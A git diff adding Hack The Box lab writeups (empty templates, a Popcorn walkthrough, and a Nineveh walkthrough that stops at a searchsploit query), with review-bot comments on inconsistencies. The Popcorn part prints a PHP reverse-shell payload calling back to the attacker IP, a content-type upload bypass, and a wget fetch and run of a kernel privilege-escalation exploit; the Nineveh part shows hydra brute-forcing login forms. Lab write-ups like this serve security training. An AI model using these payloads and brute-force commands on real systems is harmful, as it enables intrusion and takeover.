+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-19 22:08 GMT
+ Nmap scan report for localhost (127.0.0.1)
+ Host is up (0.00024s latency).
+ Not shown: 99 closed ports
+ PORT STATE SERVICE
+ 3306/tcp open mysql
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
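Review bot: `Insane/0.md` ships unfilled: Introduction, Part 2 and Part 3 still read `the text goes here`, and the Conclusion stops at `Here we can see the progress graph :` with no graph or image reference after it, so an empty writeup lands in the Insane category. The Part 1 text also promises the `-sC` and `-sV` flags while the captured command is `nmap -F 127.0.0.1` against localhost; either make the sample output match the sentence or mark the block as a placeholder to be replaced, so future writeups copied from this template do not inherit the mismatch.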
diff --git a/Insane/img/0.png b/Insane/img/0.png
new file mode 100644
index 0000000..8bdf325
Binary files /dev/null and b/Insane/img/0.png differ
diff --git a/Medium/0.md b/Medium/0.md
new file mode 100644
index 0000000..78996b5
--- /dev/null
+++ b/Medium/0.md
@@ -0,0 +1,38 @@
+# Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 127.0.0.1 ] [~]
+ → nmap -F 127.0.0.1
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-19 22:08 GMT
+ Nmap scan report for localhost (127.0.0.1)
+ Host is up (0.00024s latency).
+ Not shown: 99 closed ports
+ PORT STATE SERVICE
+ 3306/tcp open mysql
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
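Review bot: `Medium/0.md` is byte-for-byte the same file as `Insane/0.md` (both hunks are 38 lines and share blob `78996b5`), so every fix to the template has to be applied twice and the two copies will drift; keep a single template at the repository root and copy it when a writeup is started rather than committing one per difficulty folder.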
diff --git a/Medium/1.md b/Medium/1.md
new file mode 100644
index 0000000..b5a9f63
--- /dev/null
+++ b/Medium/1.md
@@ -0,0 +1,381 @@
+# Popcorn Writeup
+
+
+
+## Introduction :
+
+Popcorn is a Medium linux box released back in march 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → nmap -F 10.10.10.6
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 11:27 GMT
+ Nmap scan report for 10.10.10.6
+ Host is up (0.097s latency).
+ Not shown: 98 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.57 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → nmap -sCV 10.10.10.6 -p80,22
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 11:27 GMT
+ Nmap scan report for 10.10.10.6
+ Host is up (0.10s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
+ |_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
+ 80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
+ |_http-server-header: Apache/2.2.12 (Ubuntu)
+ |_http-title: Site doesn't have a title (text/html).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.64 seconds
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Popcorn]
+ → echo '10.10.10.6 popcorn.htb' >> /etc/hosts
+
+
+
+## **Part 2 : Getting User Access**
+
+Port 80 is opened, let's dirsearch it
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → dirsearch -u http://popcorn.htb -t 50 -e php,html,txt,js -x 403
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u <****url> -e <****php,txt,html,js> -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, html, txt, js | HTTP method: get | Threads: 50 | Wordlist size: 7126
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-20_11-35-28.log
+
+ Target: http://popcorn.htb
+
+ [11:35:28] Starting:
+ [11:35:47] 200 - 177B - /index
+ [11:35:47] 200 - 177B - /index.md
+ [11:35:56] 200 - 48KB - /test
+ [11:35:56] 200 - 48KB - /test/
+ [11:35:56] 200 - 48KB - /test.php
+
+ Task Completed
+
+Dirsearch didn't give us much results, so let's use a bigger wordlist instead
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → dirsearch -u http://popcorn.htb -t 50 -e php,html,txt,js -x 403 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, html, txt, js | HTTP method: get | Threads: 50 | Wordlist size: 220521
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-20_11-55-52.log
+
+ Target: http://popcorn.htb
+
+ [11:55:53] Starting:
+ [11:55:54] 200 - 177B - /
+ [11:55:58] 200 - 48KB - /test
+ [11:55:58] 200 - 177B - /index
+ [11:56:10] 301 - 312B - /torrent -> http://popcorn.htb/torrent/
+ [11:56:37] 301 - 311B - /rename -> http://popcorn.htb/rename/
+
+
+test.php gives off the php information running on the server :
+
+
+
+/torrent reveals a torrent hoster webpage so let's see what exploits are available for us to use on this service :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → searchsploit torrent hoster
+ -------------------------------- -------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ -------------------------------- -------------------------------
+ Torrent Hoster - Remount Upload | exploits/php/webapps/11746.txt
+ -------------------------------- -------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → locate 11746
+ /home/nihilist/Desktop/Tools/hydrus/db/client_files/fb9/b95b541ff079ea281c8f575141a428390189649e6cb9ffc0bd6117467b4f745e.png
+ /home/nihilist/Desktop/Tools/hydrus/db/client_files/tb9/b95b541ff079ea281c8f575141a428390189649e6cb9ffc0bd6117467b4f745e.thumbnail
+ /usr/share/exploitdb/exploits/php/webapps/11746.txt
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → cp /usr/share/exploitdb/exploits/php/webapps/11746.txt .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → cat 11746.txt
+
+
+
+Looking at the results, we seem to be able to gain access to the system through a php upload vulnerability. Moving over to the login page :
+
+
+
+Sending the request by clicking Login, we intercept the request with burpsuite, and copy the request in order to give it to sqlmap.
+
+
+ POST /torrent/login.php HTTP/1.1
+ Host: 10.10.10.6
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: http://10.10.10.6/torrent/login.php
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 29
+ DNT: 1
+ Connection: close
+ Cookie: /torrent/=; PHPSESSID=3ce0b9e28bbb1e6b0458748643502d21
+ Upgrade-Insecure-Requests: 1
+
+ username=admin&password;=admin
+
+
+saving it as request :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → nano request
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → sqlmap -r request --level 5 --risk 3
+ ___
+ __H__
+ ___ ___[)]_____ ___ ___ {1.4.2#stable}
+ |_ -| . [.] | .'| . |
+ |___|_ [']_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 12:12:10 /2020-02-20/
+
+ [12:12:10] [INFO] parsing HTTP request from 'request'
+ [12:12:11] [WARNING] provided value for parameter '/torrent/' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
+ [12:12:11] [INFO] testing connection to the target URL
+ [12:12:11] [INFO] checking if the target is protected by some kind of WAF/IPS
+ [12:12:12] [INFO] testing if the target URL content is stable
+ [12:12:12] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
+ how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
+ [12:12:36] [INFO] testing if POST parameter 'username' is dynamic
+ [12:12:37] [WARNING] POST parameter 'username' does not appear to be dynamic
+ [12:12:37] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
+ [12:12:37] [INFO] heuristic (XSS) test shows that POST parameter 'username' might be vulnerable to cross-site scripting (XSS) attacks
+ [12:12:37] [INFO] testing for SQL injection on POST parameter 'username'
+ it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
+ [12:12:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ [12:12:46] [WARNING] reflective value(s) found and filtering out
+ got a 302 redirect to 'http://10.10.10.6/torrent'. Do you want to follow? [Y/n] y
+ redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
+
+
+As sqlmap takes some time to run, let's head over to the signup page and try to create an account
+
+
+
+heading over to the uploading page we'll submit some random torrent file :
+
+
+
+and we have been able to upload it ! Moving over to /torrent/upload we seem to have access to uploaded images :
+
+
+
+let's change the screenshot to a reverse php png shell :
+
+
+ <****?php
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.11/1234 0>&1'");
+ ?****>
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → nano nihilist.php
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → file nihilist.php
+ nihilist.php: PHP script, ASCII text
+
+
+
+as you can see it will be considered as a php script, so that's why we will use burpsuite to intercept our request, and change it before sending it.
+
+ 
+
+Let's see if we can bypass the website filetype checks by changing the aforementionned content type header
+
+
+
+Here we can see that we successfully submitted a PHP file with an image/png request , now let's see if we can browse to it, and catch the incoming reverse shell connection :
+
+ _Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → curl -sk http://10.10.10.6/torrent/upload/20bcfc1a2b444bd933eb2d80daa7e2f20d272afe.php
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → nc -lvnp 1234
+ listening on [any] 1234 ...
+ ls
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.6] 43530
+ bash: no job control in this shell
+ www-data@popcorn:/var/www/torrent/upload$ ls
+ 20bcfc1a2b444bd933eb2d80daa7e2f20d272afe.php
+ 20bcfc1a2b444bd933eb2d80daa7e2f20d272afe.png
+ 723bc28f9b6f924cca68ccdff96b6190566ca6b4.png
+ noss.png
+ www-data@popcorn:/var/www/torrent/upload$ whoami
+ whoami
+ www-data
+ www-data@popcorn:/var/www/torrent/upload$ uname -a
+ uname -a
+ Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
+
+
+And that's it ! we have a reverse shell as www-data
+
+
+ www-data@popcorn:/var/www/torrent/upload$ cd /home
+ cd /home
+ www-data@popcorn:/home$ ls
+ ls
+ george
+ www-data@popcorn:/home$ cd george
+ cd george
+ www-data@popcorn:/home/george$ cat user.txt
+ cat user.txt
+ 5eXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Once we are in the /home/george directory, we first list what files are available for us to use so that we can somehow privesc :
+
+
+ www-data@popcorn:/tmp$ uname -a
+ uname -a
+ Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
+
+
+the uname -a command reveals us an outdated kernel version, a quick searchsploit command reveals us that we could use a privilege escalation exploit written in c :
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → searchsploit kernel 2.6.37
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privileg | exploits/linux/local/15704.c
+ Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service | exploits/linux/dos/15619.c
+ Linux Kernel 2.6.37 - Local Kernel Denial of Service (1) | exploits/linux/dos/16263.c
+ Linux Kernel 2.6.37 - Unix Sockets Local Denial of Service | exploits/linux/dos/15622.c
+ Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak | exploits/linux/local/18080.c
+ Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation | exploits/linux/local/15774.c
+ Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2 | exploits/linux/dos/16952.c
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → locate 15704.c
+ /usr/share/exploitdb/exploits/linux/local/15704.c
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → cp /usr/share/exploitdb/exploits/linux/local/15704.c .
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Popcorn]
+ → python -m SimpleHTTPServer 7070
+ Serving HTTP on 0.0.0.0 port 7070 ...
+
+
+` _Terminal 2:_
+
+
+
+ www-data@popcorn:/home/george$ which wget
+ which wget
+ /usr/bin/wget
+ www-data@popcorn:/home/george$ which curl
+ which curl
+
+
+Seems like we have both wget and curl to download our exploit from, let's use wget :
+
+
+ www-data@popcorn:/tmp$ wget http://10.10.14.11:7070/15704.c
+ wget http://10.10.14.11:7070/15704.c
+ --2020-02-20 15:16:59-- http://10.10.14.11:7070/15704.c
+ Connecting to 10.10.14.11:7070... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 9487 (9.3K) [text/plain]
+ Saving to: `15704.c'
+
+ 100%[======================================>] 9,487 --.-K/s in 0.1s
+
+ 2020-02-20 15:17:00 (90.6 KB/s) - `15704.c' saved [9487/9487]
+
+
+once we have downloaded our .c exploit, we need to compile it using gcc, add the execution right using chmod +x and executing the executable produced using ./
+
+
+ www-data@popcorn:/tmp$ gcc 15704.c -o nihilist.privesc
+ gcc 15704.c -o nihilist.privesc
+ www-data@popcorn:/tmp$ chmod +x nihilist.privesc
+ chmod +x nihilist.privesc
+ www-data@popcorn:/tmp$ ./nihilist.privesc
+ ./nihilist.privesc
+ [*] Resolving kernel addresses...
+ [+] Resolved econet_ioctl to 0xf83d4280
+ [+] Resolved econet_ops to 0xf83d4360
+ [+] Resolved commit_creds to 0xc01645d0
+ [+] Resolved prepare_kernel_cred to 0xc01647d0
+ [*] Calculating target...
+ [*] Triggering payload...
+ [*] Got root!
+ # cat /root/root.txt
+ cat /root/root.txt
+ f1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
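Review bot: the sentence `Seems like we have both wget and curl to download our exploit from` contradicts the output directly above it, where `which curl` prints nothing and only `/usr/bin/wget` is found; reword it to say only wget is available, which is why wget is used. Two more prose/output mismatches in Part 3: the opening line says `Once we are in the /home/george directory, we first list what files are available` but the block that follows is `uname -a` run from `/tmp`, and the searchsploit query is `kernel 2.6.37` while `uname -a` reported `2.6.31-14-generic-pae`, so either explain why the broader version was searched or quote the version that was actually reported. Finally, several lines carry escaping residue that will break copy-paste: `<****?php` and `?****>` around the PHP snippet, `<****url>` in the dirsearch usage banner, and `username=admin&password;=admin` in the POST body (HTML-entity residue for `&password=`); the screenshots the text refers to (`test.php gives off the php information`, the Burp request, the upload form) also have no image embed in the hunk, only blank lines, so the references point at nothing.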
diff --git a/Medium/10.md b/Medium/10.md
new file mode 100644
index 0000000..9c1dc12
--- /dev/null
+++ b/Medium/10.md
@@ -0,0 +1,629 @@
+# Nineveh Writeup
+
+
+
+## Introduction :
+
+Nineveh is a medium linux box released back in August 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → nmap -F 10.10.10.43
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 11:30 GMT
+ Nmap scan report for 10.10.10.43
+ Host is up (0.098s latency).
+ Not shown: 98 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 443/tcp open https
+
+ Nmap done: 1 IP address (1 host up) scanned in 3.37 seconds
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → nmap -sCV -p80,443 10.10.10.43
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 11:31 GMT
+ Nmap scan report for 10.10.10.43
+ Host is up (0.095s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Site doesn't have a title (text/html).
+ 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Site doesn't have a title (text/html).
+ | ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
+ | Not valid before: 2017-07-01T15:03:30
+ |_Not valid after: 2018-07-01T15:03:30
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 20.26 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running http , let's dirsearch it :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → dirsearch -u http://10.10.10.43/ -e php,txt,html -t 50 -r
+ git clone https://github.com/maurosoria/dirsearch.git
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, txt, html | HTTP method: get | Threads: 50 | Wordlist size: 6733 | Recursion level: 1
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-25_11-33-44.log
+
+ Target: http://10.10.10.43/
+
+ [11:33:45] Starting:
+ [11:33:47] 403 - 297B - /.ht_wsr.txt
+ [11:33:47] 403 - 290B - /.hta
+ [11:33:47] 403 - 299B - /.htaccess-dev
+ [11:33:47] 403 - 301B - /.htaccess-local
+ [11:33:47] 403 - 301B - /.htaccess-marco
+ [11:33:47] 403 - 299B - /.htaccess.BAK
+ [11:33:47] 403 - 300B - /.htaccess.bak1
+ [11:33:47] 403 - 299B - /.htaccess.old
+ [11:33:47] 403 - 300B - /.htaccess.orig
+ [11:33:47] 403 - 300B - /.htaccess.save
+ [11:33:47] 403 - 302B - /.htaccess.sample
+ [11:33:47] 403 - 299B - /.htaccess.txt
+ [11:33:47] 403 - 301B - /.htaccess_extra
+ [11:33:47] 403 - 300B - /.htaccess_orig
+ [11:33:47] 403 - 298B - /.htaccess_sc
+ [11:33:47] 403 - 298B - /.htaccessBAK
+ [11:33:47] 403 - 298B - /.htaccessOLD
+ [11:33:47] 403 - 299B - /.htaccessOLD2
+ [11:33:47] 403 - 296B - /.htaccess~
+ [11:33:47] 403 - 294B - /.htgroup
+ [11:33:47] 403 - 299B - /.htpasswd-old
+ [11:33:47] 403 - 300B - /.htpasswd_test
+ [11:33:47] 403 - 296B - /.htpasswds
+ [11:33:47] 403 - 294B - /.htusers
+ [11:34:02] 200 - 178B - /index.md
+ [11:34:02] 200 - 83KB - /info.php
+
+
+Our dirsearch found the info.php webpage :
+
+
+
+So now we know the box is running php version 7.0.18 on apache2.0. Before our nmap scan picked up the domain name nineveh.htb so let's add it to our /etc/hosts file.
+
+
+
+Let's not forget that we picked up port 443 running https earlier, so let's see what we can find there :
+
+
+
+And we get something different ! Now let's enumerate what we can find on this using dirsearch once again :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → dirsearch -u https://nineveh.htb/ -t 50 -x 403 -r -e php,html,txt
+ git clone https://github.com/maurosoria/dirsearch.git
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, html, txt | HTTP method: get | Threads: 50 | Wordlist size: 6733 | Recursion level: 1
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-25_12-05-15.log
+
+ Target: https://nineveh.htb/
+
+ [12:05:15] Starting:
+ [12:05:34] 301 - 309B - /db -> https://nineveh.htb/db/
+ [12:05:34] 200 - 11KB - /db/
+ [12:05:38] 200 - 49B - /index.md
+ [12:05:50] Starting: db/
+ [12:06:09] 200 - 11KB - /db/index.php
+ [12:06:09] 200 - 11KB - /db/index.php/login/
+
+ Task Completed
+
+
+And we get something else interesting ! let's check out /db :
+
+
+
+And we seem to get a phpLiteAdmin v1.9 login page with the following intercepted request :
+
+
+
+Let's see if we can enumerate port 80 a little further using the domain name nineveh.htb, but this time using gobuster :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → gobuster dir --url http://nineveh.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://nineveh.htb/
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/02/25 12:55:13 Starting gobuster
+ ===============================================================
+ /department (Status: 301)
+
+
+And we found the /department directory which redirects us to a login page which has a preety straightforward login request :
+
+
+
+Now for this next part let's use hydra to try and bruteforce the admin user password using rockyou.txt :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -V -f http-post-form '/department/login.php:username=^USER^&password;=^PASS^:invalid password'
+ Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
+
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-25 13:06:02
+ [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
+ [DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=^USER^&password;=^PASS^:invalid password
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "123456" - 1 of 14344399 [child 0] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "12345" - 2 of 14344399 [child 1] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "password" - 4 of 14344399 [child 3] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "princess" - 6 of 14344399 [child 5] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
+
+ [...]
+
+ [STATUS] 1523.00 tries/min, 4569 tries in 00:03h, 14339830 to do in 156:56h, 16 active
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "lissette" - 4570 of 14344399 [child 12] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "jamila" - 4571 of 14344399 [child 10] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "hotmail1" - 4572 of 14344399 [child 6] (0/0)
+ [ATTEMPT] target 10.10.10.43 - login "admin" - pass "hoover" - 4573 of 14344399 [child 1] (0/0)
+ [80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t
+ [STATUS] attack finished for 10.10.10.43 (valid pair found)
+ 1 of 1 target successfully completed, 1 valid password found
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-25 13:09:05
+
+
+and we have credentials ! **admin:1q2w3e4r5t** , once logged in :
+
+
+
+Although sadly there doesn't seem to be much more to see here apart from the visible LFI when browsing to the url **http://nineveh.htb/department/manage.php?notes=/path/to/file**. let's try and go back to our previous https://nineveh.htb/db/ phpLiteAdmin login page by hydra the same way we previously did :
+
+
+ POST /db/index.php HTTP/1.1
+ Host: nineveh.htb
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: https://nineveh.htb/db/
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 55
+ DNT: 1
+ Connection: close
+ Cookie: PHPSESSID=cer8n35tvn02re6go6j6tbm391
+ Upgrade-Insecure-Requests: 1
+
+ password=nihilist&remember;=yes&login;=Log+In&proc;_login=true
+
+
+So that's our login request that we interecepted with burpsuite , now let's use the appropriate hydra command :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → hydra -l admin -P /usr/share/wordlists/rockyou.txt nineveh.htb -V -f https-post-form '/db/index.php:password=^PASS^&remember;=yes&logn;=Log+In&proc;_login=true:Incorrect password'
+ Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
+
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-25 13:32:40
+ [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
+ [DATA] attacking http-post-forms://nineveh.htb:443/db/index.php:password=^PASS^&remember;=yes&logn;=Log+In&proc;_login=true:Incorrect password
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "123456" - 1 of 14344399 [child 0] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "12345" - 2 of 14344399 [child 1] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "password" - 4 of 14344399 [child 3] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "princess" - 6 of 14344399 [child 5] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
+
+ [...]
+
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "juventus" - 1397 of 14344399 [child 11] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "mahalkoh" - 1398 of 14344399 [child 7] (0/0)
+ ^[[B[ATTEMPT] target nineveh.htb - login "admin" - pass "esteban" - 1399 of 14344399 [child 6] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "mookie" - 1400 of 14344399 [child 5] (0/0)
+ [ATTEMPT] target nineveh.htb - login "admin" - pass "fresita" - 1401 of 14344399 [child 12] (0/0)
+ [443][http-post-form] host: nineveh.htb login: admin password: password123
+ [STATUS] attack finished for nineveh.htb (valid pair found)
+ 1 of 1 target successfully completed, 1 valid password found
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-25 13:34:19
+
+
+And we have it ! we have our credentials **password123** , now once we are logged in we are greeted with a dashboard :
+
+
+
+Now let's run a searchsploit command to see if we have any public exploits for us to use :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → searchsploit phpliteadmin
